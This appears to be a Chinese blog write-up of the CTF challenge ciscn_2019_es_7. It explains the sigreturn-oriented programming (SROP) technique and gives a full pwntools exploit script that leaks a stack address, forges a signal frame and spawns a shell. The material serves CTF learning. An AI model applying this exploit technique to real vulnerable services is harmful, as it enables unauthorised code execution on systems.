<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>ciscn_2019_es_7 - xia0le&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="xia0le&#039;s Blog"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="xia0le&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="SROP 例行检查，64位程序，开启了nx保护"><meta property="og:type" content="blog"><meta property="og:title" content="ciscn_2019_es_7"><meta property="og:url" content="http://example.com/2022/07/16/ciscn-2019-es-7/"><meta property="og:site_name" content="xia0le&#039;s Blog"><meta property="og:description" content="SROP 例行检查，64位程序，开启了nx保护"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620160910-nsagnx7.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161035-q73ip6e.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161240-zmwt39q.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/20210112110940751-20220620161305-0xg01jg.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/20210112111211177-20220620161316-uxg0dph.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/20210112130202757-20220620161335-77e6xog.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161511-j9lkqn9.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162428-i0uy54m.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162544-7rks03a.png"><meta property="og:image" content="http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162621-kbu63dk.png"><meta property="article:published_time" content="2022-07-16T11:29:19.000Z"><meta property="article:modified_time" content="2022-07-17T02:29:45.143Z"><meta property="article:author" content="Xia0le"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/2022/07/16/ciscn-2019-es-7/image-20220620160910-nsagnx7.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2022/07/16/ciscn-2019-es-7/"},"headline":"ciscn_2019_es_7","image":["http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620160910-nsagnx7.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161035-q73ip6e.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161240-zmwt39q.png","http://example.com/2022/07/16/ciscn-2019-es-7/20210112110940751-20220620161305-0xg01jg.png","http://example.com/2022/07/16/ciscn-2019-es-7/20210112111211177-20220620161316-uxg0dph.png","http://example.com/2022/07/16/ciscn-2019-es-7/20210112130202757-20220620161335-77e6xog.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620161511-j9lkqn9.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162428-i0uy54m.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162544-7rks03a.png","http://example.com/2022/07/16/ciscn-2019-es-7/image-20220620162621-kbu63dk.png"],"datePublished":"2022-07-16T11:29:19.000Z","dateModified":"2022-07-17T02:29:45.143Z","author":{"@type":"Person","name":"Xia0le"},"publisher":{"@type":"Organization","name":"xia0le's Blog","logo":{"@type":"ImageObject","url":"http://example.com/img/logo.png"}},"description":"SROP 例行检查，64位程序，开启了nx保护"}</script><link rel="canonical" href="http://example.com/2022/07/16/ciscn-2019-es-7/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }
          Array
              .from(document.querySelectorAll('.tab-content'))
              .forEach($tab => {
                  $tab.classList.add('is-hidden');
              });
          Array
              .from(document.querySelectorAll('.tabs li'))
              .forEach($tab => {
                  $tab.classList.remove('is-active');
              });
          const $activeTab = document.querySelector(location.hash);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
          const $tabMenu = document.querySelector(`a[href="${location.hash}"]`);
          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.2.0"></head><body class="is-1-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="xia0le&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">家</a><a class="navbar-item" href="/archives">档案</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-12"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2022-07-16T11:29:19.000Z" title="2022/7/16 19:29:19">2022-07-16</time>发表</span><span class="level-item"><time dateTime="2022-07-17T02:29:45.143Z" title="2022/7/17 10:29:45">2022-07-17</time>更新</span><span class="level-item">12 分钟读完 (大约1776个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">ciscn_2019_es_7</h1><div class="content"><p>SROP</p>
<p>例行检查，64位程序，开启了nx保护<br><img src="/2022/07/16/ciscn-2019-es-7/image-20220620160910-nsagnx7.png" alt="image.png"></p>
<span id="more"></span>
<p>本地试运行一下看看大概的情况</p>
<p><img src="/2022/07/16/ciscn-2019-es-7/image-20220620161035-q73ip6e.png" alt="image.png"><br /></p>
<p>关键函数很简单，两个系统调用,buf存在溢出</p>
<p><img src="/2022/07/16/ciscn-2019-es-7/image-20220620161240-zmwt39q.png" alt="image.png"></p>
<p>看到系统调用和溢出，想到了SROP，之前遇到过一次，关于原理可以看一下这两篇文章<br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/87447.html">https://www.freebuf.com/articles/network/87447.html</a><br><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr">https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr</a></p>
<p>具体的原理看上面的链接，贴一下第一篇文章里的知识点（有删改）<br>如下图所示，当内核向某个进程发起（deliver）一个signal，该进程会被暂时挂起（suspend），进入内核（1），然后内核为该进程保存相应的上下文，跳转到之前注册好的signal handler中处理相应signal（2），当signal handler返回之后（3），内核为该进程恢复之前保存的上下文，最后恢复进程的执行（4）。  </p>
<p><img src="/2022/07/16/ciscn-2019-es-7/20210112110940751-20220620161305-0xg01jg.png" alt="20210112110940751.png"></p>
<p>在第二步的时候，内核会帮用户进程将其上下文保存在该进程的栈上，然后在栈顶填上一个地址rt_sigreturn，这个地址指向一段代码，在这段代码中会调用sigreturn系统调用。因此，当signal handler执行完之后，栈指针（stack pointer）就指向rt_sigreturn，所以，signal handler函数的最后一条ret指令会使得执行流跳转到这段sigreturn代码，被动地进行sigreturn系统调用。下图显示了栈上保存的用户进程上下文、signal相关信息，以及rt_sigreturn，我们将这段内存称为一个Signal Frame。<br>​<img src="/2022/07/16/ciscn-2019-es-7/20210112111211177-20220620161316-uxg0dph.png" alt="20210112111211177.png"></p>
<p>在内核<code>sigreturn</code>系统调用处理函数中，会根据当前的栈指针指向的<code>Signal Frame</code>对进程上下文进行恢复，并返回用户态，从挂起点恢复执行。</p>
<p>Signal机制缺陷利用</p>
<p>首先，内核替用户进程将其上下文保存在Signal Frame中，然后，内核利用这个Signal Frame恢复用户进程的上下文，done！那么，问题来了：</p>
<p>第一、这个Signal Frame是被保存在用户进程的地址空间中的，是用户进程可读写的；</p>
<p>第二、内核并没有将保存的过程和恢复的过程进行一个比较，也就是说，在sigreturn这个系统调用的处理函数中，内核并没有判断当前的这个Signal Frame就是之前内核为用户进程保存的那个Signal Frame。</p>
<p>按照作者slides里面的说法，“kernel agnostic about signal handlers”既是一个优点，因为内核不需要花精力来记录其发起的signal，但是，这也是一个缺点，正因为内核对其的不可知性，使得恶意的用户进程可以对其进行伪造！</p>
<p>让我们先来假设一个攻击者可以控制用户进程的栈，那么它就可以伪造一个Signal Frame，如下图所示<br>​<img src="/2022/07/16/ciscn-2019-es-7/20210112130202757-20220620161335-77e6xog.png" alt="20210112130202757.png"><br /></p>
<p>在这个伪造的Signal Frame中，将rax设置成59（即execve系统调用号），将rdi设置成字符串&#x2F;bin&#x2F;sh的地址（该字符串可以是攻击者写在栈上的），将rip设置成系统调用指令syscall的内存地址，最后，将rt_sigreturn手动设置成sigreturn系统调用的内存地址。那么，当这个伪造的sigreturn系统调用返回之后，相应的寄存器就被设置成了攻击者可以控制的值，在这个例子中，一旦sigreturn返回，就会去执行execve系统调用，打开一个shell。  </p>
<p>这是一个最简单的攻击。在这个攻击中，有4个前提条件：<br>第一，攻击者可以通过stack overflow等漏洞控制栈上的内容；<br>第二，需要知道栈的地址（比如需要知道自己构造的字符串&#x2F;bin&#x2F;sh的地址）；<br>第三，需要知道syscall指令在内存中的地址；<br>第四，需要知道sigreturn系统调用的内存地址。  </p>
<p>搞清楚上述的内容后就可以解出这道题了</p>
<ol>
<li>buf存在溢出，可以控制栈上的内容，满足了第一个条件</li>
<li>程序使用了一次read一次write，buf的大小只有0x10，但是write打印了0x30，会打印多余的东西，</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">rax=<span class="number">0x4004f1</span></span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&quot;/bin/sh&quot;</span>+<span class="string">&quot;\x00&quot;</span>*<span class="number">9</span>+p64(rax))</span><br><span class="line">p.recv(<span class="number">32</span>)</span><br><span class="line">stack_addr=u64(p.recv(<span class="number">8</span>))</span><br><span class="line">log.success(<span class="string">&quot;stack: &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line">p.recv(<span class="number">8</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/2022/07/16/ciscn-2019-es-7/image-20220620161511-j9lkqn9.png" alt="image.png"></p>
<p>我们先往buf里写入内容，write会打印出来，接收看一下，打印出来了多余的地址，我们接收一下就获得了栈上的地址<br> 找一下‘bin&#x2F;sh’在栈上的地址</p>
<p><img src="/2022/07/16/ciscn-2019-es-7/image-20220620162428-i0uy54m.png" alt="image.png"></p>
<p>找到它在栈上的地址是0x7fffffffe4b0，与泄露出来的栈上的地址的偏移是0x7fffffffe4b0-0x7fffffffe5c8&#x3D;0x118,每次加载的地址都不一样，但是泄露的栈地址和bin&#x2F;sh的偏移是固定的，所以我们可以用stack_addr-0x118来表示bin&#x2F;sh的地址<br>这里面就有了栈地址和bin&#x2F;sh的地址，满足了第二个条件  </p>
<p>找一下<code>syscall;ret</code>指令在内存中的地址,利用SROP构造系统调用串（System call chains）,满足了第三个条件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ciscn_2019_es_7|grep syscall</span><br></pre></td></tr></table></figure>

<p><img src="/2022/07/16/ciscn-2019-es-7/image-20220620162544-7rks03a.png" alt="image.png"><br /></p>
<p>找一下sigreturn系统调用的内存地址<br>如果我们将sigreturn当做一个系统调用来看待的话，那么其实这个单独的gadget并不是必须的。因为我们可以将rax寄存器设置成15（sigreturn的系统调用号），然后调用一个syscall，效果和调用一个sigreturn是一样一样的。<br>发现程序里有现成的rax&#x3D;15（调用sigreturn）和rax&#x3D;59（调用execv），满足了第四个条件<br><br /><img src="/2022/07/16/ciscn-2019-es-7/image-20220620162621-kbu63dk.png" alt="image.png"></p>
<p>条件都满足了，接下来就可以用pwntools来帮助我们生成这个<code>Signal Frame</code>了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">sigframe = SigreturnFrame()</span><br><span class="line">sigframe.rax = constants.SYS_execve</span><br><span class="line">sigframe.rdi = stack_addr - <span class="number">0x118</span>  </span><br><span class="line">sigframe.rsi = <span class="number">0x0</span></span><br><span class="line">sigframe.rdx = <span class="number">0x0</span></span><br><span class="line">sigframe.rsp = stack_addr</span><br><span class="line">sigframe.rip = syscall_ret</span><br></pre></td></tr></table></figure>

<p>完成溢出</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p.send(<span class="string">&quot;/bin/sh&quot;</span>+<span class="string">&quot;\x00&quot;</span>*(<span class="number">0x1</span>+<span class="number">0x8</span>)+p64(sigreturn_addr)+p64(syscall_ret)+<span class="built_in">str</span>(sigframe))</span><br></pre></td></tr></table></figure>


<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p=process(<span class="string">&quot;ciscn_2019_es_7&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> args.R:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27182</span>)</span><br><span class="line">syscall_ret=<span class="number">0x400517</span></span><br><span class="line">sigreturn_addr=<span class="number">0x4004da</span></span><br><span class="line">system_addr=<span class="number">0x4004E2</span></span><br><span class="line">rax=<span class="number">0x4004f1</span></span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&quot;/bin/sh&quot;</span>+<span class="string">&quot;\x00&quot;</span>*<span class="number">9</span>+p64(rax))</span><br><span class="line">p.recv(<span class="number">32</span>)</span><br><span class="line">stack_addr=u64(p.recv(<span class="number">8</span>))</span><br><span class="line">log.success(<span class="string">&quot;stack: &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line">p.recv(<span class="number">8</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">binsh = stack_addr - <span class="number">0x118</span> </span><br><span class="line">sigframe = SigreturnFrame()</span><br><span class="line">sigframe.rax = constants.SYS_execve</span><br><span class="line">sigframe.rdi = binsh </span><br><span class="line">sigframe.rsi = <span class="number">0x0</span></span><br><span class="line">sigframe.rdx = <span class="number">0x0</span></span><br><span class="line">sigframe.rsp = stack_addr</span><br><span class="line">sigframe.rip = syscall_ret</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&quot;/bin/sh&quot;</span>+<span class="string">&quot;\x00&quot;</span>*(<span class="number">0x1</span>+<span class="number">0x8</span>)+p64(sigreturn_addr)+p64(syscall_ret)+<span class="built_in">str</span>(sigframe))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
</div><div class="article-licensing box"><div class="licensing-title"><p>ciscn_2019_es_7</p><p><a href="http://example.com/2022/07/16/ciscn-2019-es-7/">http://example.com/2022/07/16/ciscn-2019-es-7/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Xia0le</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2022-07-16</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-07-17</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/07/17/2022seetf/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">2022seetf</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/07/16/hello-world/"><span class="level-item">Hello World</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left  order-1 is-sticky"><!--!--></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="xia0le&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2022 Xia0le</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>